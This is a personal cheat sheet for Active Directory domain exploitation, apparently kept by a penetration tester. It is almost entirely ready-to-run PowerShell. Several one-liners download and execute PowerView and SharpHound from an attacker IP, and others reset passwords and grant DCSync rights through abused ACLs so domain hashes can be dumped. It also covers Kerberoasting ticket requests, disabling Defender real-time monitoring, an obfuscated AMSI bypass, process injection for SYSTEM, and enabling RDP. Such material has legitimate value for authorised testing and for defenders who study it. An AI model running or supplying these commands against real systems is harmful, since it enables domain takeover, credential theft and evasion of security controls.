Domain Exploitation

This is just a living document of things I have needed for domain enumeration/exploitation

POWERSPLOIT

Use the dev branch or PowerSploit. For an already incredible cheat sheet, check out HarmJ0y's.

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')

Get Domain Users

Get-NetUser * -Domain corp.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset, lastlogontimestamp,accountexpires,admincount,userprincipalname, serviceprincipalname, mail,useraccountcontrol | Export-CSV users.csv

Get Domain Computers

Get-NetComputer * -Domain corp.local | Select-Object -Property dnshostname,operatingsystem,operatingsystemservicepack,lastlogontimestamp | Export-CSV computers.csv

SPN Ticket Request

Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation

Enumerate User DACLs

PS C:\> Get-DomainObjectAcl -Identity it_admin -ResolveGUIDs ? { $_.SecurityIdentifier -Match $(ConvertTo-SID burmat) }
AceType : AccessAllowed
ObjectDN : CN=it_admin,CN=Users,DC=BURMAT,DC=CO
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2736429227-4547413232-2815246478-1130
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2736429227-4547413232-2815246478-1107
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

Reset Domain User Password

If you own the owner of another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc), you can reset the password with ease:

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;

Or if you can set yourself as owner, the following will do:

IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass

Add/Exploit DCSync Rights

Do you have WriteDACL to a domain? Give DCSync rights to an unprivileged domain user account:

Add-DomainObjectAcl -TargetIdentity "DC=burmatco,DC=local" -PrincipalIdentity useracct1 -Rights DCSync

And use these rights to dump the hashes from the domain:

meterpreter > dcsync_ntlm BURMATCO\\useracct1

BLOODHOUND

Ingestor Launch

IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.123/ps/SharpHound.ps1');
Invoke-BloodHound -CollectionMethod All -CompressData -SkipPing;

EVADING AV

Turning Off Defender's RTM

PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true

AMSI Bypass

PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)

SeDebugPrivilege

If you run whoami /priv and you see SeDebugPrivilege set to Enabled, you can assume you already have SYSTEM.

One way of doing it, is using decoder's psgetsys.ps1 script once you have a good idea on a PID to inject:

. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864,'C:\temp\burmat443.exe');

You can also gain a MSF session and use the module windows/manage/payload_inject with a PID of your choice.

REMOTE DESKTOP

Enable RDP

PS C:\> Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"